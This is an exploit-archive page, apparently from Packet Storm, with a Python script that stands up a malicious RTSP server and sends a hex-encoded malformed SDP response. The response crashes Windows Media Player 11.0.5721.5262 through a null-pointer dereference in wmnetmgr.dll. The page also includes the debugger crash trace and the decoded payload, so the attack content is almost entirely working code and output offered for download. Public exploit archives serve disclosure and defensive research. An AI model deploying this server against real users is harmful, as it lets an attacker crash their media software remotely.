Windows Media Player 11.0.5721.5262 Denial Of Service

Windows Media Player 11.0.5721.5262 Denial Of Service: Posted Dec 25, 2011; Authored by Level; Microsoft Windows Media Player version 11.0.5721.5262 remote denial of service exploit.; tags | exploit, remote, denial of service; systems | windows; SHA-256 | 8f956aea0456c97de55561f1b85fde6e2d17e46339271b02a273569d29f09677; Download | Favorite | View

Windows Media Player 11.0.5721.5262 Denial Of Service

import socket, binascii
print "\n" 
print "----------------------------------------------------------------"
print "|      WMP11 Remote Null Pointer                                |"
print "|      Level, Smash the Stack                                   |"
print "|      Windows XP SP3 x86, Windows Media Player v11.0.5721.5262 |"
print "|      Windows 7 SP2 x64, Windows Media Player v11.0.5721.5262  |"
print "----------------------------------------------------------------"
print "\n"
print "Attack URL: mms://127.0.0.1/Sample_Broadcast\n\n"
HOST = "127.0.0.1"
PORT = 554
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)
buf = [
("525453502f312e3020323038204f4b0d0a436f6e74656e742d547970653a206170706c696361746"
"96f6e2f7364700d0a566172793a204163636570740d0a582d506c61796c6973742d47656e2d49643"
"a203137360d0a582d42726f6164636173742d49643a20300d0a436f6e74656e742d4c656e6774683"
"a203837390d0a446174653a2053756e2c203038204d617920323031312031353a32343a333320474"
"d540d0a435365713a20310d0a5365727665723a20574d5365727665722f392e312e312e333834310"
"d0a537570706f727465643a20636f6d2e6d6963726f736f66742e776d2e73727670706169722c206"
"36f6d2e6d6963726f736f66742e776d2e737377697463682c20636f6d2e6d6963726f736f66742e7"
"76d2e656f736d73672c20636f6d2e6d6963726f736f66742e776d2e6661737463616368652c20636"
"f6d2e6d6963726f736f66742e776d2e7061636b657470616972737372632c20636f6d2e6d6963726"
"f736f66742e776d2e7374617274757070726f66696c650d0a4c6173742d4d6f6469666965643a205"
"361742c2031372046656220323030372031333a31343a303420474d540d0a457461673a202231363"
"8220d0a43616368652d436f6e74726f6c3a206d61782d6167653d38363339392c20782d776d732d7"
"3747265616d2d747970653d2262726f6164636173742c20706c61796c697374222c206d7573742d7"
"26576616c69646174652c20707269766174652c20782d776d732d70726f78792d73706c69740d0a0"
"d0a763d306f3d2d20323031313035303831343339313330343036203230313130353038313433393"
"1333034303620494e20495034203132372e302e302e310d0a733d3c4e6f205469746c653e633d494"
"e2049503420302e302e302e30623d52523a30613d70676d70753a646174613a6170706c696361746"
"96f6e2f766e642e6d732e776d732d6864722e61736676313b6261736536342c4d4361796459356d7"
"a78476d3251437141474c4f624e4142414141414141414142674141414145436f6479726a4565707"
"a78474f35414441444342545a5767414141414141414141414141414141414141414141414141414"
"1414141414c784141414141414141414141414141414141414141664141414141414141414843677"
"7676b4141414141764d6e50435141414141433546514141414141414141414141414147416741414"
"26749414145673741414331413739664c716e504559376a414d414d49464e6c4c674141414141414"
"141415230744f7275716e504559376d414d414d49464e6c42674141414141416b516663743765707"
"a78474f35674441444342545a566f414141414141414141414f4562746b35627a78476f2f5143415"
"83178454b7742582b794256573838527150304167463963524373414141414141414141414177414"
"1414141414141414151414141414141514145414150414141414141414141416b516663743765707"
"a78474f35674441444342545a5849414141414141414141514a35702b4531627a78476f2f5143415"
"83178454b31444e77372b50596338526937494171674330346941414141414141414141414277414"
"1414149414141414167414141414141595145424145416641414151414141414151415141416f414"
"143494141434141414141414141455141424141415141417a6e5834653431473052474e676742676"
"c386d69736959414141414141414141416741424145673741414143414567374141417a4a724a316"
"a6d62504561625a414b6f41597335734b67414141414141414141434141494141674143414141414"
"141414141414141414141324a724a316a6d62504561625a414b6f415973357337443441414141414"
"1414141414141414141414141414141414141414141414148774141414141414141414241513d3d7"
"43d3020300d0a6d3d617564696f2030205254502f415650203936613d72656c6961626c650d0a0d0"
"a0d0a")
]
while True:
conn, addr = s.accept()
print "-----Request From Client-----\n"
print conn.recv(1024)
print "-----Request From Client-----\n"
print "-----Response From Server-----\n"
print binascii.unhexlify(buf[0])
print "-----Response From Server-----\n"
conn.send(binascii.unhexlify(buf[0]))
conn.close()
s.close()
 
#CRASH
#(ae8.5b8): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000
#eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0         nv up ei pl zr na pe nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
#*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\wmnetmgr.dll -
#wmnetmgr!DllUnregisterServer+0x76320:
#128cd479 8bb914010000    mov     edi,dword ptr [ecx+114h] ds:0023:00000114=????????
#0:021> g
#(ae8.5b8): Access violation - code c0000005 (!!! second chance !!!)
#eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000
#eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0         nv up ei pl zr na pe nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
#wmnetmgr!DllUnregisterServer+0x76320:
#128cd479 8bb914010000    mov     edi,dword ptr [ecx+114h] ds:0023:00000114=????????
 
#PAYLOAD#
#RTSP/1.0 208 OK
#Content-Type: application/sdp
#Vary: Accept
#X-Playlist-Gen-Id: 176
#X-Broadcast-Id: 0
#Content-Length: 879
#Date: Sun, 08 May 2011 15:24:33 GMT
#CSeq: 1
#Server: WMServer/9.1.1.3841
#Supported: com.microsoft.wm.srvppair, com.microsoft.wm.sswitch, com.microsoft.wm.eosmsg, com.microsoft.wm.fastcache, com.microsoft.wm.packetpairssrc, com.microsoft.wm.startupprofile
#Last-Modified: Sat, 17 Feb 2007 13:14:04 GMT
#Etag: "168"
#Cache-Control: max-age=86399, x-wms-stream-type="broadcast, playlist", must-revalidate, private, x-wms-proxy-split
#v=0o=- 201105081439130406 201105081439130406 IN IP4 127.0.0.1
#s=<No Title>c=IN IP4 0.0.0.0b=RR:0a=pgmpu:data:application/vnd.ms.wms-hdr.asfv1;base64,MCaydY5mzxGm2QCqAGLObNABAAAAAAAABgAAAAECodyrjEepzxGO5ADADC
#BTZWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALxAAAAAAAAAAAAAAAAAAAAfAAAAAAAAAHCgwgkAAAAAvM
#nPCQAAAAC5FQAAAAAAAAAAAAAGAgAABgIAAEg7AAC1A79fLqnPEY7jAMAMIFNlLgAAAAAAAAAR0tOruq
#nPEY7mAMAMIFNlBgAAAAAAkQfct7epzxGO5gDADCBTZVoAAAAAAAAAAOEbtk5bzxGo/QCAX1xEKwBX+y
#BVW88RqP0AgF9cRCsAAAAAAAAAAAwAAAAAAAAAAQAAAAAAQAEAAPAAAAAAAAAAkQfct7epzxGO5gDADC
#BTZXIAAAAAAAAAQJ5p+E1bzxGo/QCAX1xEK1DNw7+PYc8Ri7IAqgC04iAAAAAAAAAAABwAAAAIAAAAAg
#AAAAAAYQEBAEAfAAAQAAAAAQAQAAoAACIAACAAAAAAAAEQABAAAQAAznX4e41G0RGNggBgl8misiYAAA
#AAAAAAAgABAEg7AAACAEg7AAAzJrJ1jmbPEabZAKoAYs5sKgAAAAAAAAACAAIAAgACAAAAAAAAAAAAAA
#A2JrJ1jmbPEabZAKoAYs5s7D4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAHwAAAAAAAAABAQ==t=0 0m=audio 0 RTP/AVP 96a=reliable

Top Authors In Last 30 Days

Red Hat 194 files
Ubuntu 101 files
indoushka 31 files
Debian 22 files
Gentoo 14 files
CraCkEr 11 files
Mirabbas Agalarov 9 files
Apple 8 files
nu11secur1ty 6 files
LiquidWorm 6 files

File Archives

Systems

AIX (428)
Apple (1,979)
BSD (373)
CentOS (57)
Cisco (1,920)
Debian (6,758)
Fedora (1,691)
FreeBSD (1,244)
Gentoo (4,321)
HPUX (879)
iOS (344)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (45,866)
Mac OS X (685)
Mandriva (3,105)
NetBSD (256)
OpenBSD (482)
RedHat (13,370)
Slackware (941)
Solaris (1,610)
SUSE (1,444)
Ubuntu (8,652)
UNIX (9,246)
UnixWare (186)
Windows (6,557)
Other

Windows Media Player 11.0.5721.5262 Denial Of Service

Windows Media Player 11.0.5721.5262 Denial Of Service

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Windows Media Player 11.0.5721.5262 Denial Of Service

Share This

Windows Media Player 11.0.5721.5262 Denial Of Service

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems